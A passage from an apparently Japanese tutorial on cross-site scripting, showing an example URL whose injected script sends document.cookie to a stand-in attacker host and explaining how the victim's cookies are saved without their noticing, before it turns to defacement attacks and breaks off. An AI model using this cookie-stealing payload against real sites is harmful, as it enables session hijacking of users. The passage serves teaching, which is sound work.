http://yarareta.hoge/yowai.jsp?name=<script>location.href= 'http://clacker.clacker/getCookie.jsp?param='%20%2B%20 document.cookie;</script> この中のgetCookie.jspは、取得したクッキーを攻撃者(クラッカー)のデータベース (ファイルシステム)に保存する機能を持つものとします。処理後に再び元のページにリダイレクトするようになっていると、何が行われたかをユーザーが気付くことはほとんどありません。こんなわずかな処理だけで、任意のユーザーが保存しているcookieの内容を第三者によって盗聴されてしまうのです。 このような、ユーザーが実害を受ける可能性のある攻撃以外にも、掲示板のページを破壊してしまうような攻撃もあります。例えば、imgタグを利用して掲